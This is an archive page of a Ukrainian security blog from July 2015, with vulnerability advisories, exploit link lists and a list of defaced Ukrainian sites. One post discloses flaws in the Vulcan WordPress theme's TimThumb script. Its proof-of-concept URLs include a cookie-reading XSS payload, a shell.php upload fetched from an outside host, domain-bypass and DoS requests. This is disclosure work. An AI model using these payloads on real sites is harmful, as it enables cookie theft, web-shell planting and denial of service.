Архів за Липень, 2015

XXE уразливість в Apache Jackrabbit

20:07 04.07.2015

Виявлена XML External Entity (XXE) уразливість в Apache Jackrabbit.

Уразливі версії: Apache Jackrabbit 2.10.

XXE через запит WebDAV.

Добірка експлоітів

17:22 04.07.2015

В даній добірці експлоіти в веб додатках:

  • Thycotic Secret Server 8.8.000004 - Stored XSS (деталі)
  • Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure (деталі)
  • Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability (деталі)
  • Adobe Flash Player NetConnection Type Confusion (деталі)
  • Novell ZENworks Configuration Management Arbitrary File Upload (деталі)

Уразливості в плагінах для WordPress №191

23:54 03.07.2015

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в WordPress 4.0 та в плагінах Html5 Mp3 Player, Sexy Squeeze Pages, Ad-Manager, CM Download Manager. Для котрих з’явилися експлоіти.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Підміна вмісту в Perl Module::Signature

22:49 03.07.2015

Виявлена підміна вмісту в Perl модулі Module::Signature.

Уразливі версії: perl-Module-Signature 0.73.

Непідписаний вміст може бути інтерпретований як підписаний та можливе виконання довільного коду.

Похакані сайти №298

20:08 03.07.2015

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://ipo.gov.ua (хакером Moroccan Agent Secret) - 06.04.2015 - похаканий державний сайт, зараз сайт вже не працює
  • http://zhytomyr.man.gov.ua (хакерами з Fallaga Team) - 26.06.2015 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://autodop.kiev.ua (хакерами Lakhdar Dz і Moh Ooasiic)
  • http://judiciary.chv.ua (хакером AKINCILAR) - 18.04.2015, зараз сайт вже виправлений адмінами
  • http://www.sport-uprav.cv.ua (хакером Karim-TN) - 29.04.2015, зараз сайт вже виправлений адмінами

Добірка уразливостей

17:25 03.07.2015

В даній добірці уразливості в веб додатках:

Численні уразливості в темі Vulcan для WordPress

23:55 02.07.2015

Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Vulcan для WordPress. Ці уразливості аналогічні тим, що я знайшов в темах для WP ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні).

XSS (WASC-08) (в старих версіях TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/timthumb.php?src=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31) (в старих версіях TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Уразливі всі версії теми Vulcan для WordPress (в останніх версіях виправлені лише уразливості в TimThumb, але все ще є FPD в інших php-файлах).

У версіях TimThumb до 2.8, де виправлена XSS, наявні всі інші уразливості. А починаючи з версії 2.8 виправлені всі уразливості. Але дірки AoF і DoS виправлені шляхом заборони зовнішніх хостів по замовчуванню. Якщо змінити налаштування (дозволити окремі чи всі зовнішні хости), що програма дозволяє, то знову можна буде проводити атаки на інші сайти. На деяких сайтах не оновлена версія TimThumb в темі, але вони захищаються WAF (як ModSecurity). Зазначу, що WAF не захистить від FPD дірок в цій темі та TimThumb, а в деяких випадках не захистить від AoF і DoS.

Вийшли Mozilla Firefox 38.0.1 і 38.0.5

22:49 02.07.2015

У травні, 14.05.2015, вийшов Mozilla Firefox 38.0.1. Нова версія браузера вийшла через 2 дні після виходу Firefox 38.

Це секюріті та багфікс випуск в якому виправлені баги, а також вибивання браузера. Мозіла не зарахувала цей crash до уразливостей, а до багів, як вона це дуже часто робить.

А у червні, 02.06.2015, вийшов Mozilla Firefox 38.0.5. Це коригувальний випуск в якому виправлені баги та доданий новий функціонал (Reader View, спільний доступ до вікна чи вкладки у клієнті Hello, інтеграція сервісу Pocket).

  • Релиз Firefox 38.0.5 с режимом читателя и поддержкой сервиса Pocket (деталі)

Численні уразливості в Microsoft Internet Explorer

20:02 02.07.2015

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6, 7, 8, 9, 10, 11 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7, Windows 8, Windows 2012 Server, Windows 8.1.

Численні пошкодження пам’яті.

  • Microsoft Security Bulletin MS15-056 - Critical Cumulative Security Update for Internet Explorer (3058515) (деталі)

Добірка експлоітів

17:21 02.07.2015

В даній добірці експлоіти в веб додатках:

  • D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change (деталі)
  • ManageEngine Asset Explorer 6.1 - Stored XSS (деталі)
  • Endian Firewall < 3.0.0 - OS Command Injection (Python PoC) (деталі)
  • Endian Firewall < 3.0.0 - OS Command Injection (Metasploit Module) (деталі)
  • Adobe Flash Player Drawing Fill Shader Memory Corruption (деталі)